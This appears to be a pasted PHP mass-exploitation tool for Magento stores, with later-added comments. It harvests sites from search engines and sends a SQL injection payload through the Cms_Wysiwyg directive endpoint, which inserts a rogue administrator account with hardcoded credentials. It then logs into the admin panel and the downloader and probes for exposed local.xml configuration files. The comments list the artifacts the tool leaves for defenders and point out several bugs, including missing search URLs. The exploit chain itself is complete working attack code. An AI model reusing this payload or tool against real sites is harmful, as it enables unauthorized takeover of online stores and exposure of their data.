
Magento Shell Admin

Jan 28th, 2017
<?php
// Author's note in Indonesian slang (an insult aimed at whoever copies the file); not code.
// Removes the max-execution-time limit so the search and exploit loops below can run without timing out.
set_time_limit(0);
/**
 * Mass-exploitation tool for an old Magento admin-creation flaw (called "ShopLift" throughout this file).
 *
 * Flow: SearchEngine() scrapes site URLs from search-result pages for a dork, then for each site
 * ExecuteExploit() sends the SQL payload (ShopLiftExploit), logs in to /downloader/ and /admin/
 * with the injected credentials, and appends the result to a local ShopLift-<date>.log file.
 *
 * Defender notes -- artifacts this code leaves, all taken from the code below:
 *  - every request carries User-Agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
 *  - POST /admin/Cms_Wysiwyg/directive/index/ with base64-encoded "filter" and "___directive"
 *    fields and "forwarded=1"
 *  - a new admin_user row with username "acid", firstname "Firstname", lastname "Lastname",
 *    email "<15 hex chars>@telekpitekwashere.cok", plus an admin_role row named "Firstname"
 *  - GET /app/etc/local.xml (the magmi download_file.php path is listed but never reached, see
 *    LocalFileDiscloure)
 *  - POST /downloader/ and POST /admin/ with the same username/password
 *  - on the attacker host: cookie.txt and ShopLift-dd-mm-YYYY.log in the working directory
 *
 * The search-engine base URLs are missing from this paste (each query string starts with ""
 * or a bare country code), so as pasted the harvesting requests are not well-formed URLs.
 */
class PakHaxor {
    // Search query ("dork") set by Dork(), read by SearchEngine().
    private $dork = "";
    // Credentials of the admin account the SQL payload creates and that the login methods reuse.
    // Original comment (Indonesian): "change to your own user/password".
    private $username = "acid";
    private $password = "Acid123!!";

    /**
     * Stores the dork and returns it unchanged.
     *
     * @param string $dork search query
     * @return string the stored dork
     */
    public function Dork($dork){
        $this->dork = $dork;
        return $this->dork;
    }

    /**
     * Fetches $url with cURL, as a POST when $post is an array, otherwise as a GET.
     *
     * TLS certificate and hostname verification are both disabled and redirects are followed.
     * POST fields are joined as key=value&... without URL-encoding the values; the rtrim()
     * result is discarded, so the trailing '&' stays in the body. count($isi) is called on a
     * string (a warning on PHP 7.2+, a TypeError on PHP 8). The cookie jar is the relative
     * file cookie.txt, so every session cookie lands in the current working directory.
     *
     * @param string      $url
     * @param array|false $post form fields, or false for a plain GET
     * @return string|false response body, or false when curl_exec() fails
     */
    private function CurlPost($url, $post = false){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        if($post !== false){
            $isi = '';
            foreach($post as $key=>$value){
                $isi .= $key.'='.$value.'&';
            }
            rtrim($isi, '&'); // return value unused: the trailing '&' is not actually removed
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, count($isi));
            curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
            curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
        }
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }

    /**
     * Returns the text between the first occurrence of $start and the next occurrence of $end.
     *
     * $a[1] is read unconditionally, so a $string that does not contain $start raises an
     * undefined-index notice and the result is built from null.
     *
     * @param string $start opening delimiter
     * @param string $end   closing delimiter
     * @param string $string haystack
     * @return string
     */
    private function GetStr($start,$end,$string){
        $a = explode($start,$string);
        $b = explode($end,$a[1]);
        return $b[0];
    }

    /**
     * POSTs the stored credentials to <scheme>://<host>/downloader/ and reports whether the
     * login succeeded ("Log Out" or "Return to Admin" in the response).
     *
     * Only the write-permission line is ever returned: the first `return` makes the SMTP and
     * File_System checks below it unreachable. Those checks also use eregi(), which was removed
     * in PHP 7.0.
     *
     * @param string $url target site URL (scheme and host are used)
     * @return string "Success\nPermission..." or "Failed"
     */
    private function LoginDownloader($url){
        $link = parse_url($url);
        $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
            array("username" => $this->username,
                  "password" => $this->password)
        );
        if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
            $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
            return "Success\nPermission\t\t: ".$permission;
            // Unreachable from here on (see docblock).
            $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
            return "Success\nSmtpPro\t\t: ".$smtp;
            $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
            return "Success\nFile system\t\t: ".$filesystem;
        } else {
            return "Failed";
        }
    }

    /**
     * Logs in to <scheme>://<host>/admin/ with the stored credentials.
     *
     * First GETs the login page to scrape the hidden form_key, then POSTs login[username],
     * login[password] and form_key. The response is never checked for success; the returned
     * string always starts with "Success" and carries the first <span class="price"> value
     * from the dashboard. LocalFileDiscloure() is called twice (once to test, once to print),
     * so a writable target receives two probe requests for local.xml.
     *
     * @param string $target target site URL
     * @return string report line(s)
     */
    private function LoginAdmin($target){
        $link = parse_url($target);
        $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
        $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
        $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
            array("login[username]" => $this->username,
                  "login[password]" => $this->password,
                  "form_key" => $key)
        );
        if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
            return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
        } else {
            return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
        }
    }

    /**
     * Sends the SQL injection payload to /admin/Cms_Wysiwyg/directive/index/.
     *
     * The base64-encoded "filter" value chains extra SQL statements onto a grid filter: it
     * builds a salted MD5 password hash for $this->password, inserts an admin_user row
     * (username $this->username, email "<15 hex chars>@telekpitekwashere.cok", the hex chars
     * coming from md5(time())) and an admin_role row named "Firstname". Success is inferred
     * only from the response decoding as an image (imagecreatefromstring() !== false, errors
     * suppressed with @) -- the inserted row itself is never verified here.
     *
     * @param string $target "<scheme>://<host>"
     * @return bool
     */
    private function ShopLiftExploit($target){
        $email = substr(md5(time()),2,15);
        $link = parse_url($target);
        $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
            array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
                  "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
                  "forwarded" => "1")
        );
        return (@imagecreatefromstring($data) !== false);
    }

    /**
     * Runs the full chain against one harvested URL and returns a printable result.
     *
     * Opens ShopLift-<d-m-Y>.log for append, normalises $victim to "<scheme>://<host>" (adding
     * "http://" when no scheme was parsed), and on a positive ShopLiftExploit() result logs in
     * to the downloader and the admin panel and appends the report to the log. Only successes
     * are written to the file. Both branches return before fclose(), so the handle is never
     * closed explicitly (PHP releases it at script end).
     *
     * @param string $victim URL or host harvested by SearchEngine()
     * @return string report block, or a "Not vuln" line
     */
    private function ExecuteExploit($victim){
        $file = fopen("ShopLift-".date("d-m-Y").".log","a");
        $url = parse_url($victim);
        $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
        if($this->ShopLiftExploit($target)){
            $downloader = $this->LoginDownloader($target);
            $admin = $this->LoginAdmin($target);
            $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
            fwrite($file,$result);
            return $result;
        }else {
            return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
        }
        // Unreachable: both branches above return first.
        fclose($file);
    }

    /**
     * Probes for an exposed app/etc/local.xml and returns the <date> CDATA value from it.
     *
     * Two paths are listed, but the loop returns on its first iteration in both branches, so
     * only $path[0] ("/app/etc/local.xml") is ever requested; the magmi path and the
     * `<= count($path)` bound (one past the last index) never come into play. A response is
     * treated as a hit when it matches both /install/i and /date/i.
     *
     * @param string $target "<scheme>://<host>"
     * @return string|false the <date> value, or false
     */
    private function LocalFileDiscloure($target){
        $path = array( "/app/etc/local.xml",
                       "/magmi/web/download_file.php?file=../../app/etc/local.xml"
        );
        for($i=0;$i<=count($path);$i++){
            $test = $this->CurlPost($target.$path[$i]);
            if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
                return $this->GetStr("<date><![CDATA[","]]></date>",$test);
            } else {
                return false;
            }
        }
    }

    /**
     * Harvests result links for the stored dork from one search engine, then runs
     * ExecuteExploit() on every unique link collected.
     *
     * $engine selects the engine (1 Bing, 2 Bing per country, 3 Google per country, 4 Ask per
     * country, 5 Walla, 6 Onet, 7 Sapo, 8 Lycos, 9 Uol, 10 Seznam, 11 Hotbot, 12 Aol, 13 Yahoo,
     * 14 Yahoo per country); any other value matches no case and collects nothing. Each case
     * pages through results, extracts hrefs with a per-engine regex, drops links pointing back
     * at the engine itself, and de-duplicates with in_array(). The engine base URLs are absent
     * from this paste, so each request URL begins with the encoded dork or a country code.
     *
     * @param int $engine engine selector, 1..14
     * @return void
     */
    public function SearchEngine($engine){
        $list = array();
        $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
        $ccgoogle = array("ae"); // the remaining Google country codes were commented out in the original
        $ccask = array("au","uk","ca","de","it","fr","es","ru","nl","pl","at","se","dk","no","br","mx","jp");
        $ccyahoo = array("au","ru","at","pl","il","tr","ua","gr","jp","cn","my","id","th","in","kr","tw","ro","za","pt","ca","uk","de","fr","es","it","hk","mx","br","ar","nl","dk","ph","cl","ru","co","fi","ve","nz","pe");
        switch($engine){
            case 1: // Bing, pages 0..1000 step 10
                for($i=0;$i<=1000;$i+=10){
                    $search = $this->CurlPost("".urlencode($this->dork)."&first=".$i);
                    preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/live|msn|bing|microsoft/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Bing (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Bing : ".count($list)."\n";
                break;
            case 2: // Bing, one pass per country code in $ccbing
                for($x=0;$x<=count($ccbing)-1;$x++){
                    for($i=0;$i<=1000;$i+=10){
                        $search = $this->CurlPost("".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
                        preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/live|msn|bing|microsoft/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "[".date("H:i:s")."] Catch Bing.".$ccbing[$x]." (".count(array_unique($m[1])).")\n";
                    }
                }
                echo "[".date("H:i:s")."] Total Bing World : ".count($list)."\n";
                break;
            case 3: // Google, one pass per country code in $ccgoogle
                for($x=0;$x<=count($ccgoogle)-1;$x++){
                    for($i=0;$i<=200;$i+=10){
                        $search = $this->CurlPost("".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
                        preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/google/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "[".date("H:i:s")."] Catch Google.".$ccgoogle[$x]." (".count(array_unique($m[1])).")\n";
                    }
                }
                echo "[".date("H:i:s")."] Total Google World : ".count($list)."\n";
                break;
            case 4: // Ask, one pass per country code in $ccask
                for($x=0;$x<=count($ccask)-1;$x++){
                    for($i=1;$i<=1000;$i+=100){
                        $search = $this->CurlPost("http://".$ccask[$x]."".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
                        preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/ask\.com/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "[".date("H:i:s")."] Catch Ask.".$ccask[$x]."(".count(array_unique($m[1])).")\n";
                    }
                }
                echo "[".date("H:i:s")."] Total Ask World : ".count($list)."\n";
                break;
            case 5: // Walla
                for($i=1;$i<=100;$i+=1){
                    $search = $this->CurlPost("".urlencode($this->dork)."&type=text&page=".$i);
                    preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/walla\.co\.il/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Walla (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Walla : ".count($list)."\n";
                break;
            case 6: // Onet
                for($i=1;$i<=400;$i+=10){
                    $search = $this->CurlPost("".$i.",query.html?qt=".urlencode($this->dork));
                    preg_match_all('/<a href=\"http:\/\/(.*?)\">/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/onet|webcache|query/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Onet (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Onet : ".count($list)."\n";
                break;
            case 7: // Sapo
                for($i=1;$i<=50;$i+=1){
                    $search = $this->CurlPost("".$i."&q=".urlencode($this->dork)."&st=local");
                    preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/\.sapo\.pt/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Sapo (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Sapo : ".count($list)."\n";
                break;
            case 8: // Lycos
                for($i=1;$i<=50;$i+=1){
                    $search = $this->CurlPost("".urlencode($this->dork)."&pn=".$i);
                    preg_match_all('/title=\"http:\/\/(.*?)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/lycos/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Lycos (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Lycos : ".count($list)."\n";
                break;
            case 9: // Uol (the per-page message says "Aol"; the total says "Uol")
                for($i=1;$i<=1000;$i+=10){
                    $search = $this->CurlPost("".urlencode($this->dork)."&start=".$i);
                    preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/uol\.com\.br|\/web/i",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Uol : ".count($list)."\n";
                break;
            case 10: // Seznam
                for($i=1;$i<=300;$i+=20){
                    $search = $this->CurlPost("".urlencode($this->dork)."&count=20&from=".$i);
                    preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Seznam (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Seznam : ".count($list)."\n";
                break;
            case 11: // Hotbot
                for($i=1;$i<=50;$i+=1){
                    $search = $this->CurlPost("".$i."&q=".urlencode($this->dork));
                    preg_match_all('/href=\"http:\/\/(.+?)\" title=/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/hotbot\.com/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Hotbot (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Hotbot : ".count($list)."\n";
                break;
            case 12: // Aol
                for($i=1;$i<=300;$i+=10){
                    $search = $this->CurlPost("".urlencode($this->dork)."&page=".$i);
                    preg_match_all('/href=\"http:\/\/(.*?)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/aol\.com/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Aol : ".count($list)."\n";
                break;
            case 13: // Yahoo
                for($i=1;$i<=1000;$i+=10){
                    $search = $this->CurlPost("".urlencode($this->dork)."&b=".$i);
                    preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/yahoo/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "[".date("H:i:s")."] Catch Yahoo (".count(array_unique($m[1])).")\n";
                }
                echo "[".date("H:i:s")."] Total Yahoo : ".count($list)."\n";
                break;
            case 14: // Yahoo, one pass per country code in $ccyahoo
                for($x=0;$x<=count($ccyahoo)-1;$x++){
                    for($i=1;$i<=1000;$i+=100){
                        $search = $this->CurlPost("http://".$ccyahoo[$x].";_ylt=A0geu8nrPalPnkQAVmPrFAx.?p=".urlencode($this->dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=hk&vm=p&fl=0&fr=yfp-t-501&fp_ip=11&xargs=0&pstart=1&b=".$i);
                        preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/yahoo".$ccyahoo[$x]."/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "[".date("H:i:s")."] Catch Yahoo.".$ccyahoo[$x]." (".count(array_unique($m[1])).")\n";
                    }
                }
                echo "[".date("H:i:s")."] Total Yahoo World : ".count($list)."\n";
                break;
        }
        // Every harvested link is attacked immediately, in collection order.
        if(count($list)>0){
            echo "Exploiting target ".count($list).". Please wait ... \n";
            foreach($list as $do){
                echo $this->ExecuteExploit($do);
            }
        }
    }

    /**
     * Prints the usage banner; the script name is taken from $_SERVER["SCRIPT_FILENAME"].
     *
     * @return void
     */
    public function ExploitLogo(){
        $logo = "==================================================\n";
        $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
        $logo .= "#------------------------------------------------#\n";
        $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
        $logo .= "#------------------------------------------------#\n";
        $logo .= "#\t (C) ".date("Y")." Recoded By Mr. Haxor \t\t #\n";
        $logo .= "==================================================\n";
        echo $logo;
    }
}
// Command-line entry point.
//   php <script> "<dork>"      -- one dork
//   php <script> -l <file>     -- one dork per line, read with file_get_contents()
// With no argument the banner is printed. For every dork, SearchEngine() is called for
// $i = 0..14; 0 matches no case in the switch, so only 1..14 do anything.
$Exploiter = new PakHaxor();
if(isset($argv[1]) && !empty($argv[1])){
    if($argv[1]=="-l" && !empty($argv[2])){
        $file = file_get_contents($argv[2]);
        $list = explode("\n",$file);
        // explode() always returns an array, so this isset() is always true; a blank trailing
        // line in the file becomes an empty dork.
        if(isset($list)){
            echo "Starting engine ....\n";
            flush();
            sleep(2);
            echo "[".date("H:i:s")."] Scanning ".count($list)." dorks. Please wait ... \n";
            foreach($list as $dork){
                echo "[".date("H:i:s")."] Scanning target for dork : {$dork}\n";
                $Exploiter->Dork($dork);
                for($i=0;$i<15;$i++){
                    $Exploiter->SearchEngine($i);
                    flush();
                    sleep(1);
                }
            }
        }
    } else {
        echo "Starting engine ....\n";
        flush();
        sleep(2);
        echo "[".date("H:i:s")."] Scanning target for dork : {$argv[1]}\n";
        $Exploiter->Dork($argv[1]);
        for($i=0;$i<15;$i++){
            $Exploiter->SearchEngine($i);
            flush();
            sleep(1);
        }
    }
    echo "Scan finished !!!\n";
    flush();
    sleep(1);
    echo "Shuting down engine !!!\n";
} else {
    $Exploiter->ExploitLogo();
}